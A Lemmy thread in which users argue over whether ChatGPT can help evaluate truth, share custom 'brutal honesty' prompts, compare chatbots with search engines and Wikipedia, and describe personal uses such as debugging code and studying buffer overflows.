this post was submitted on 05 May 2025
432 points (95.6% liked)

Technology

69770 readers
3804 users here now

This is a most excellent place for technology news and articles.


Our Rules


  1. Follow the lemmy.world rules.
  2. Only tech related news or articles.
  3. Be excellent to each other!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, this includes using AI responses and summaries. To ask if your bot can be added please contact a mod.
  9. Check for duplicates before posting, duplicates may be removed
  10. Accounts 7 days and younger will have their posts automatically removed.

Approved Bots


founded 2 years ago
MODERATORS
you are viewing a single comment's thread
view the rest of the comments
[–] Zozano@aussie.zone 15 points 2 days ago* (last edited 2 days ago) (2 children)

This is the reason I've deliberately customized GPT with the follow prompts:

  • User expects correction if words or phrases are used incorrectly.

  • Tell it straight—no sugar-coating.

  • Stay skeptical and question things.

  • Keep a forward-thinking mindset.

  • User values deep, rational argumentation.

  • Ensure reasoning is solid and well-supported.

  • User expects brutal honesty.

  • Challenge weak or harmful ideas directly, no holds barred.

  • User prefers directness.

  • Point out flaws and errors immediately, without hesitation.

  • User appreciates when assumptions are challenged.

  • If something lacks support, dig deeper and challenge it.

I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.

[–] dzso@lemmy.world 7 points 1 day ago (1 children)

I'm not saying these prompts won't help, they probably will. But the notion that ChatGPT has any concept of "truth" is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.

[–] Zozano@aussie.zone 1 points 1 day ago* (last edited 1 day ago) (1 children)

What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. Tweak it a little, and Gpt is more consistent and applies reasoning patterns that outperform the average human by miles.

Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn't “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.

So yes, it can evaluate truth. Not perfectly, but often better than the average person.

[–] dzso@lemmy.world 2 points 1 day ago (1 children)

I'm not saying humans are infallible at recognizing truth either. That's why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.

[–] Zozano@aussie.zone -1 points 1 day ago (1 children)

Right now, the capabilities of LLM's are the worst they'll ever be. It could literally be tomorrow that someone drops and LLM that would be perfectly calibrated to evaluate truth claims. But right now, we're at least 90% of the way there.

The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.

You don't blame the tool, you blame the user. LLM's are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent, well read and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.

I'm curious as to what you regard as a better tool for evaluating truth?

Period.

[–] dzso@lemmy.world 1 points 1 day ago* (last edited 1 day ago) (1 children)

You don't understand what an LLM is, or how it works. They do not think, they are not intelligent, they do not evaluate truth. It doesn't matter how smart you think you are. In fact, thinking you're so smart that you can get an LLM to tell you the truth is downright dangerous naïveté.

[–] Zozano@aussie.zone 1 points 1 day ago* (last edited 1 day ago) (1 children)

I do understand what an LLM is. It's a probabilistic model trained on massive corpora to predict the most likely next token given a context window. I know it's not sentient and doesn't “think,” and doesn’t have beliefs. That’s not in dispute.

But none of that disqualifies it from being useful in evaluating truth claims. Evaluating truth isn't about thinking in the human sense, it's about pattern-matching valid reasoning, sourcing relevant evidence, and identifying contradictions or unsupported claims. LLMs do that very well, especially when prompted properly.

Your insistence that this is “dangerous naïveté” confuses two very different things: trusting an LLM blindly, versus leveraging it with informed oversight. I’m not saying GPT magically knows truth, I’m saying it can be used as a tool in a truth-seeking process, just like search engines, logic textbooks, or scientific journals. None of those are conscious either, yet we use them to get closer to truth.

You're worried about misuse, and so am I. But claiming the tool is inherently useless because it lacks consciousness is like saying microscopes can't discover bacteria because they don’t know what they're looking at.

So again: if you believe GPT is inherently incapable of aiding in truth evaluation, the burden’s on you to propose a more effective tool that’s publicly accessible, scalable, and consistent. I’ll wait.

[–] dzso@lemmy.world 1 points 1 day ago (1 children)

What you're describing is not an LLM, it's tools that an LLM is programmed to use.

[–] Zozano@aussie.zone 0 points 1 day ago* (last edited 1 day ago) (1 children)

No, I’m specifically describing what an LLM is. It's a statistical model trained on token sequences to generate contextually appropriate outputs. That’s not “tools it uses", that is the model. When I said it pattern-matches reasoning and identifies contradictions, I wasn’t talking about external plug-ins or retrieval tools, I meant the LLM's own internal learned representation of language, logic, and discourse.

You’re drawing a false distinction. When GPT flags contradictions, weighs claims, or mirrors structured reasoning, it's not outsourcing that to some other tool, it’s doing what it was trained to do. It doesn't need to understand truth like a human to model the structure of truthful argumentation, especially if the prompt constrains it toward epistemic rigor.

Now, if you’re talking about things like code execution, search, or retrieval-augmented generation, then sure, those are tools it can use. But none of that was part of my argument. The ability to track coherence, cite counterexamples, or spot logical fallacies is all within the base LLM. That’s just weights and training.

So unless your point is that LLMs aren't humans, which is obvious and irrelevant, all you've done is attack your own straw man.

[–] dzso@lemmy.world 0 points 1 day ago (1 children)

So you're describing a reasoning model, which is 1) still based on statistical token sequences and 2) trained on another tool (logic and discourse) that it uses to arrive at the truth. It's a very fallible process. I can't even begin to count the number of times that a reasoning model has given me a completely false conclusion. Research shows that even the most advanced LLMs are giving incorrect answers as much as 40% of the time IIRC. Which reminds me of a really common way that humans arrive at truth, which LLMs aren't capable of:

Fuck around and find out. Also known as the scientific method.

[–] Zozano@aussie.zone 1 points 1 day ago* (last edited 1 day ago)

You're not actually disagreeing with me, you’re just restating that the process is fallible. No argument there. All reasoning models are fallible, including humans. The difference is, LLMs are consistently fallible, in ways that can be measured, improved, and debugged (unlike humans, who are wildly inconsistent, emotionally reactive, and prone to motivated reasoning).

Also, the fact that LLMs are “trained on tools like logic and discourse” isn’t a weakness. That’s how any system, including humans, learns to reason. We don’t emerge from the womb with innate logic, we absorb it from language, culture, and experience. You’re applying a double standard: fallibility invalidates the LLM, but not the human brain? Come on.

And your appeal to “fuck around and find out” isn't a disqualifier; it’s an opportunity. LLMs already assist in experiment design, hypothesis testing, and even simulating edge cases. They don’t run the scientific method independently (yet), but they absolutely enhance it.

So again: no one's saying LLMs are perfect. The claim is they’re useful in evaluating truth claims, often more so than unaided human intuition. The fact that you’ve encountered hallucinations doesn’t negate that - it just proves the tool has limits, like every tool. The difference is, this one keeps getting better.

Edit: I’m not describing a “reasoning model” layered on top of an LLM. I’m describing what a large language model is and does at its core. Reasoning emerges from the statistical training on language patterns. It’s not a separate tool it uses, and it's not “trained on logic and discourse” as external modules. Logic and discourse are simply part of the training data; meaning they’re embedded into the weights through gradient descent, not bolted on as tools.

[–] Olap@lemmy.world 10 points 2 days ago (5 children)

I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There's these things called newspapers that exist, they aren't like they used to be but there is a choice of which to buy even.

I've no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.

[–] vegetvs@kbin.earth 3 points 2 days ago (1 children)

I still use Ecosia.org for most of my research on the Internet. It doesn't need as much resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

[–] A_norny_mousse@feddit.org 3 points 2 days ago

People always forget about the energy it takes. 10 years ago we were shocked about the energy a Google factory needs to run; now imagine that orders of magnitude larger, and for what?

[–] Deceptichum@quokk.au 2 points 2 days ago* (last edited 2 days ago) (1 children)

Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

Search engines aren’t great with vague questions.

There’s this thing called using a wide variety of tools to one’s benefit; You should go learn about it.

[–] Olap@lemmy.world -1 points 2 days ago (1 children)

You search for topics and keywords on search engines. It's a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!

And a tool which regurgitates rubbish in a verbose manner isn't a tool. It's a toy. Toy's can spark your curiosity, but you don't rely on them. Toy's look pretty, and can teach you things. The lesson is that they aren't a replacement for anything but lorem ipsum

[–] Deceptichum@quokk.au 2 points 2 days ago* (last edited 2 days ago) (1 children)

Buddy that's great if you know the topic or keyword to search for, if you don't and only have a vague query that you're trying to find more about to learn some keywords or topics to search for, you can use AI.

You can grandstand about tools vs toys and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.

[–] Olap@lemmy.world 0 points 2 days ago (1 children)

I'm still sceptical, any chance you could share some prompts which illustrate this concept?

[–] Deceptichum@quokk.au 5 points 2 days ago* (last edited 2 days ago) (1 children)

Sure an hour ago I had watched a video about smaller scales and physics below planck length. And I was curious, if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be. From there I was able to 'chat' with an AI and discover and search wikipedia for terms such as Cosmological horizon, brane cosmology, etc.

In the end there was only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped product driven adsense shit we have today.

Remember how people used to say you can't use Wikipedia, it's unreliable. We would roll our eyes and say "yeah but we scroll down to the references and use it to find source material"? Same with LLM's, you sort through it and get the information you need to get the information you need.

[–] Olap@lemmy.world 0 points 2 days ago (1 children)

Wikipedia isn't to be referenced for scientific papers, I'm sure we all agree there. But it does do almost exactly what you described. https://en.m.wikipedia.org/wiki/Shape_of_the_universe has some great further reading links. https://en.m.wikipedia.org/wiki/Cosmology has some great reads too. And for the time short: https://simple.m.wikipedia.org/wiki/Cosmology which also has Related Pages

I'm still yet to see how AI beats a search engine. And your example hasn't convinced me either

[–] Deceptichum@quokk.au 5 points 2 days ago

If you still can't see how natural language search is useful, that's fine. We can, and we're happy to keep using it.

[–] Zozano@aussie.zone 2 points 2 days ago (1 children)

I often use it to check whether my rationale is correct, or if my opinions are valid.

[–] Olap@lemmy.world 0 points 2 days ago (1 children)

You do know it can't reason and literally makes shit up approximately 50% of the time? Be quicker to toss a coin!

[–] Zozano@aussie.zone 3 points 2 days ago* (last edited 2 days ago) (2 children)

Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.

I've also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.

[–] LainTrain@lemmy.dbzer0.com 2 points 2 days ago* (last edited 2 days ago) (2 children)

Yeah this is my experience as well.

People you're replying to need to stop with the "gippity is bad" nonsense, it's actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.

In fact, if you haven't found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don't do anything that complicated in your life where this would give you genuine value.

The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it's like a dunning-kruger curve.

[–] Satellaview@lemmy.zip 2 points 1 day ago (1 children)

…you probably don’t do anything that complicated in your life where this would give you genuine value.

God that’s arrogant.

[–] LainTrain@lemmy.dbzer0.com 1 points 1 day ago

I know, and that's fair. But am I wrong? That's what matters more than anything else.

I make a lot of bold statements on this account, but I never do so lightly or unthinkingly.

[–] Zozano@aussie.zone 2 points 2 days ago

Granted, it is flakey unless you've configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

[–] Olap@lemmy.world 1 points 2 days ago (1 children)

Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too

[–] Zozano@aussie.zone 1 points 2 days ago

I'm good enough at noticing my own flaws, as not to be arrogant enough to believe I'm immune from making mistakes :p

[–] LainTrain@lemmy.dbzer0.com 1 points 2 days ago (1 children)

YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it's not gonna make you an expert on any subject. You're on the right track with reading, but let's be real you're not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I'd rather they teach me how I can never have to eat again because boy that shit takes up so much time.

[–] Olap@lemmy.world 0 points 2 days ago

For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don't let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don't be tribal.

Don't use AI. Do your own thinking

[–] A_norny_mousse@feddit.org 1 points 2 days ago* (last edited 1 day ago) (1 children)

💯

I have yet to see people using chatbots for anything actually & everyday useful. You can search anything with a "normal" search engine, phrase your searches as questions (or "prompts"), and get better answers that aren't smarmy.

Also think of the orders of magnitude more energy ai sucks, compared to web search.

[–] LainTrain@lemmy.dbzer0.com 5 points 2 days ago* (last edited 2 days ago)

Okay, challenge accepted.

I use it to troubleshoot my own code when I'm dealing with something obscure and I'm at my wits end. There's a good chance it will also spit out complete nonsense like calling functions with parameters that don't exist etc., but it can also sometimes make halfway decent suggestions that you just won't find on a modern search engine in any reasonable amount of time or that I would have never guessed to even look for due to assumptions made in the docs of a library or some such.

It's also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB's examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).

It was also much much faster than watching some greedy time vampire fuck spout off on YouTube in between the sponsorblock skipping his reminders to subscribe and whatnot.

Maybe not an everyday thing, but it's basically an everyday thing for me, so I tend to use it everyday. Being a l33t haxx0r IT analyst schmuck often means I have to both be a generalist and a specialist in every tiny little thing across IT, while studying it there's nothing better than a machine that's able to decompress knowledge from it's dataset quickly in the shape that is most well suited to my brain rather than have to filter so much useless info and outright misinformation from random medium articles and stack overflow posts. Gippity could be wrong too of course, but it's just way less to parse, and the odds are definitely in its favour.